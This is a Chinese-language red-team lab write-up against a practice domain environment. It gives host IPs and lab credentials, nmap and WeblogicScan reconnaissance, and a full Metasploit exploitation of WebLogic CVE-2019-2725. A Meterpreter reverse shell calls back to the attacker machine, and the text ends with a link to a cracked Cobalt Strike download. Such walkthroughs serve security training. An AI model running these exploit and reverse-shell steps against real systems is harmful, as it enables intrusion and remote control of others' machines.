ATTCK实战系列——红队实战(二)

环境配置

环境说明

信息收集

Nmap进行端口探测

获得信息

漏洞检测

检测weblogic是否存在漏洞

漏洞利用

CS上线

连接到团队服务器

Windows连接

添加监听器

MSF派生shell

内网信息收集

内网渗透的简单思路

内网主机探活+端口扫描

Run Mimikatz

添加smb监听器

提权

横向提权

权限维持

环境配置

首先在VMware->编辑->虚拟网络编辑器里更改子网ip为192.168.111.0

环境说明

IP：10.10.10.10

OS：Windows 2012

WEB（初始的状态默认密码无法登录，切换用户 de1ay/1qaz@WSX 登录进去）

IP1：10.10.10.80

IP2：192.168.111.80

OS：Windows 2008

IP1：10.10.10.201

IP2：192.168.111.201

OS：Windows 7

攻击机

IP：192.168.111.128

OS：Kali

内网网段：10.10.10.0/24

DMZ网段：192.168.111.0/24

管理员账号密码：Administrator/1qaz@WSX

先从WEB机开始，注意需要手动开启服务，在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理，管理员身份运行它即可。

信息收集

Nmap进行端口探测

由于防火墙的存在不能使用icmp包，所以使用syn包探测

nmap -sS -sV 192.168.111.80
-sS 使用SYN半开式扫描
-sV 探测服务版本信息
SYN扫描：nmap向服务器发送一个syn数据报文，如果侦测到端口开放并返回SYN-ACK响应报文，nmap立即中断此次连接

此外也可通过常用nmap用法进行端口探测

 nmap -A -T4 -v -Pn 192.168.111.80
-A 进行全面扫描（操作系统检测、版本检测、脚本检测和跟踪路由）
-T4 设置时序，级别越高速度越快
-v 显示更加详细的信息
-Pn 无ping扫描

获得信息

中间件：IIS7.5

操作系统：Windows Server 2008 R2

数据库：SQL server （开启了1433端口，SQL server默认端口为1433）

80端口：常见web网站

139端口：对应Samba服务

445端口：对应SMB服务

3389端口：对应开启远程桌面

7001端口：对应存在WebLogic（WebLogic是一种免费的web容器）

漏洞检测

访问80端口

nothing at all，什么都没有

访问7001端口

看来存在业务

检测weblogic是否存在漏洞

这里利用github上一个weblogic漏洞检测工具——WeblogicScan

 python3 WeblogicScan.py -u 192.168.111.80 -p 7001

存在cve-2017-10271、cve-2017-3506、cve-2019-2725、cve-2019-2729历史漏洞

漏洞利用

这里使用CVE-2019-2725(Weblogic反序列化漏洞)

CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞，这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞，通过针对Oracle官网历年来的补丁构造payload来绕过。

打开msf，search cve-2019-2725

set rhosts 192.168.111.80
set lhosts 192.168.111.128
set target Windows
set payload windows/meterpreter/reverse_tcp

msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
[*] Using configured payload cmd/unix/reverse_bashmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.111.80
rhosts => 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.111.128
lhost => 192.168.111.128
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):Name       Current Setting               Required  Description----       ---------------               --------  -----------Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS     192.168.111.80                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT      7001                          yes       The target port (TCP)SSL        false                         no        Negotiate SSL/TLS for outgoing connectionsTARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseServiceVHOST                                    no        HTTP server virtual hostPayload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.111.128  yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----1   Windowsmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run[*] Started reverse TCP handler on 192.168.111.128:4444
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (175174 bytes) to 192.168.111.80
[*] Meterpreter session 1 opened (192.168.111.128:4444 -> 192.168.111.80:65427 ) at 2022-02-25 07:33:38 -0500meterpreter >

漏洞利用成功！

CS上线

CS下载地址：cobalt strike4.4破解版下载|cs4.4|cobalt strike4.4 cracked -